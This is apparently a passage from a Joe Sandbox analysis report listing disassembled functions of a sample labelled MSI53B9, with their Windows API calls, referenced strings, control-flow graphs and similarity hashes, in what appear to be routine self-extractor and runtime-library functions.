                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00889016
                                                • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00889006
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                              • String ID: EDIT
                                              • API String ID: 4243998846-3080729518
                                              • Opcode ID: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
                                              • Instruction ID: 45de21eb989921775f4ab31de088c25de719b86d94e3c72cf9a026e01174abb6
                                              • Opcode Fuzzy Hash: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
                                              • Instruction Fuzzy Hash: CEF0893260163867FB306A659C05FAB76ACFB46B11F080065FA40F2981D764AD01C7E6

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                              • OleInitialize.OLE32(00000000), ref: 0088904F
                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
                                              • SHGetMalloc.SHELL32(008B20E8), ref: 00889090
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                              • String ID: riched20.dll
                                              • API String ID: 3498096277-3360196438
                                              • Opcode ID: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
                                              • Instruction ID: 62fb9a3436d9b0fa7a21919a42ed943dd2e12bf9f8dd662c0f002b9e57bca5c2
                                              • Opcode Fuzzy Hash: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
                                              • Instruction Fuzzy Hash: 06F04FB1C00119ABDB50AF9AD8499EEFFFCFF85300F00405AE814E2700D7B85605CBA2

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 754 88be0a-88be35 call 88cec0 SetEnvironmentVariableW call 87ef07 758 88be3a-88be3e 754->758 759 88be40-88be44 758->759 760 88be62-88be66 758->760 761 88be4d-88be54 call 87effe 759->761 764 88be46-88be4c 761->764 765 88be56-88be5c SetEnvironmentVariableW 761->765 764->761 765->760
                                              APIs
                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088BE20
                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID: sfxcmd$sfxpar
                                              • API String ID: 1431749950-3493335439
                                              • Opcode ID: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
                                              • Instruction ID: 07f8c7a062b279241345a5447c89d4e5446ddd9b90e8809a655072a176480293
                                              • Opcode Fuzzy Hash: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
                                              • Instruction Fuzzy Hash: D7F0A772801224AADB213F98DC0DAF67799FF09B51F004091FD88D6541DB649C40C7B1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 766 87973d-87975e call 88cec0 769 879767 766->769 770 879760-879765 766->770 771 879769-879786 769->771 770->769 770->771 772 87978e-879798 771->772 773 879788 771->773 774 87979d-8797c8 CreateFileW 772->774 775 87979a 772->775 773->772 776 87982c-879841 774->776 777 8797ca-8797ec GetLastError call 87b275 774->777 775->774 778 879843-879856 call 87f10e 776->778 779 87985b-879866 776->779 783 8797ee-879810 CreateFileW GetLastError 777->783 784 87981b-879820 777->784 778->779 785 879816-879819 783->785 786 879812 783->786 784->776 787 879822 784->787 785->776 785->784 786->785 787->776
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0087777A,?,00000005,?,00000011), ref: 008797BD
                                              • GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008797CA
                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0087777A,?,00000005,?), ref: 008797FF
                                              • GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879807
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              • Opcode ID: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
                                              • Instruction ID: 1645c290221f9e78de94871949aaa0b8a6ea0c2609dfadeb37bb7804d7845ee8
                                              • Opcode Fuzzy Hash: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
                                              • Instruction Fuzzy Hash: 073154708407456FE3209F248C45BE6BBA4FB46360F108629F9D4C72D1E375D888CBA1
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00879623
                                              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0087963B
                                              • GetLastError.KERNEL32 ref: 0087966D
                                              • GetLastError.KERNEL32 ref: 0087968C
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
                                              • Instruction ID: b0613d9f3d3f0e7372fc1035863423e6d539831aac021e26e072bbbaa1580029
                                              • Opcode Fuzzy Hash: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
                                              • Instruction Fuzzy Hash: E3117970500608EBDF209F65C804A6A77A9FB26335F10C62AF9EEC5298D73ACD40DF52
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00892213,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue), ref: 00897803
                                              • GetLastError.KERNEL32(?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000,00000364,?,008963F1), ref: 0089780F
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000), ref: 0089781D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
                                              • Instruction ID: bf81a57fdf919e1d12dd5c2f3ddd45d471c25cb016912e1e758ca3a148416fdb
                                              • Opcode Fuzzy Hash: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
                                              • Instruction Fuzzy Hash: E701FC32725226ABDB215B799C48E6A7798FF457B2B140630F906E7640D720D800CAD4
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
                                              • TranslateMessage.USER32(?), ref: 0088994A
                                              • DispatchMessageW.USER32(?), ref: 00889954
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Message$DispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 4217535847-0
                                              • Opcode ID: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
                                              • Instruction ID: 40378df34ec88d338b93cee452d734be7aa2a81a09c8dc10e276952ee71ddbda
                                              • Opcode Fuzzy Hash: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
                                              • Instruction Fuzzy Hash: 4DE0ED72C0212EA79B24ABE6AC4CCEF7FACFE072657004015B519D2800D7789506C7F1
                                              APIs
                                                • Part of subcall function 0087DEB5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0087DED4
                                                • Part of subcall function 0087DEB5: GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4
                                              • GetCurrentProcessId.KERNEL32(?,?,?,0087DF2E), ref: 0087DFB5
                                              Strings
                                              • CryptProtectMemory failed, xrefs: 0087DF75
                                              • CryptUnprotectMemory failed, xrefs: 0087DFAD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AddressProc$CurrentProcess
                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                              • API String ID: 2190909847-396321323
                                              • Opcode ID: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
                                              • Instruction ID: b5b0e4e4b82032ad87401a85b76c87589b6d7f77c5f00229274ceab047271d41
                                              • Opcode Fuzzy Hash: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
                                              • Instruction Fuzzy Hash: C8117A7130C7162BEB119B39CC10E6A33A9FF95B58B04C019F80EDF18AEF60EC008691
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0087FBD5
                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0087FC1C
                                                • Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                              • String ID: CreateThread failed
                                              • API String ID: 2655393344-3849766595
                                              • Opcode ID: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
                                              • Instruction ID: 42503b99fc6412158ee9d8e102236866adee3936efd3e5e16ff085e800532db9
                                              • Opcode Fuzzy Hash: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
                                              • Instruction Fuzzy Hash: AA0126713047096FE3206F59DC42F627799FB82721F10443EFB46D2585DAE2E8418631
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,?,?,0087C853,00000001,?,?,?,00000000,0088420B,?,?,?,?,?,00883CB0), ref: 00879BE3
                                              • WriteFile.KERNEL32(?,00000000,?,00883EB8,00000000,?,?,00000000,0088420B,?,?,?,?,?,00883CB0,?), ref: 00879C23
                                              • WriteFile.KERNELBASE(?,00000000,?,00883EB8,00000000,?,00000001,?,?,0087C853,00000001,?,?,?,00000000,0088420B), ref: 00879C50
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FileWrite$Handle
                                              • String ID:
                                              • API String ID: 4209713984-0
                                              • Opcode ID: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
                                              • Instruction ID: 8d4bda59bbc8662aeef6f2a075165d04afab1823cc9d88fcc4b400e38a04e6ca
                                              • Opcode Fuzzy Hash: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
                                              • Instruction Fuzzy Hash: 62314571108619AFEF21CE18D848BA6BBE8FB92710F00C119F5D8D75D4C735E848CBA2
                                              APIs
                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EAD
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EE0
                                              • GetLastError.KERNEL32(?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EFD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$ErrorLast
                                              • String ID:
                                              • API String ID: 2485089472-0
                                              • Opcode ID: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
                                              • Instruction ID: 52cab8d1b6a8c4399c6e7acb9cf12eecc962a21236cbdac250c7466c1ce9e910
                                              • Opcode Fuzzy Hash: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
                                              • Instruction Fuzzy Hash: 2F01F532110158A6EB21EA6C8C45FFF374DFF06341F088411F88DD2499DBA0C98197E2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: CMT
                                              • API String ID: 3519838083-2756464174
                                              • Opcode ID: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
                                              • Instruction ID: 0619b2a9dfc0c15bdbe2b9396d08142789a16bb74059be3bd6ef0ef0d3f2a4ed
                                              • Opcode Fuzzy Hash: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
                                              • Instruction Fuzzy Hash: F8619E71504F44AADB21DB78CC459E7BBE8FB14301F44896EE1AEC7146DB32AA48DF12
                                              APIs
                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008982E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Info
                                              • String ID:
                                              • API String ID: 1807457897-3916222277
                                              • Opcode ID: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
                                              • Instruction ID: 8ac48a68a39c1f28c0d7239cb4a4cafc976748d93df859cc228f943295a8a216
                                              • Opcode Fuzzy Hash: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
                                              • Instruction Fuzzy Hash: B641197050424DDBDF229E288C84AFABBA9FF46708F5804EDE58AC6242D6359945DF60
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00871DA6
                                                • Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: CMT
                                              • API String ID: 3519838083-2756464174
                                              • Opcode ID: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
                                              • Instruction ID: 7ee73e44629623c249d77b91b180c5e8cc7bf05d372c08d783b39e0bda7340d1
                                              • Opcode Fuzzy Hash: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
                                              • Instruction Fuzzy Hash: 702126729002099BCF15EF9CC9459EEFBF6FF58300B104069E849A3665CB329A14DB62
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: CMT
                                              • API String ID: 3519838083-2756464174
                                              • Opcode ID: cda8656a9cb1b038c8b721a5148752aade52a9bfc556fe90137b9dac0dcadd3a
                                              • Instruction ID: 97740e4653805c1838568176ebc8f9a8746cd7681c13afa2199961a61181930a
                                              • Opcode Fuzzy Hash: cda8656a9cb1b038c8b721a5148752aade52a9bfc556fe90137b9dac0dcadd3a
                                              • Instruction Fuzzy Hash: F311AE70A00205AFDF04DF6CC499ABEFBBAFF95300F44805AE409D7645DB30D952DA61
                                              APIs
                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00897A7A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: String
                                              • String ID: LCMapStringEx
                                              • API String ID: 2568140703-3893581201
                                              • Opcode ID: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
                                              • Instruction ID: 4bf4c54f17bf75dc0481763709e557901f3fea2ac1356b5b578069f23c531065
                                              • Opcode Fuzzy Hash: 922623a428a7fbd3041b203b36c7a866382d9e24a78abb0b6b1eae0df8ed89f8
                                              • Instruction Fuzzy Hash: 49011372500219BBDF02AF94DC06EEE7FA2FB49710F044114FE19A5260CA369A31AB85
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0089709A), ref: 008979F2
                                              Strings
                                              • InitializeCriticalSectionEx, xrefs: 008979C2
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin
                                              • String ID: InitializeCriticalSectionEx
                                              • API String ID: 2593887523-3084827643
                                              • Opcode ID: 9da74f3dd0469c2c0f592cca11339211b6623126aab14a048aab7c7cb83aa8cb
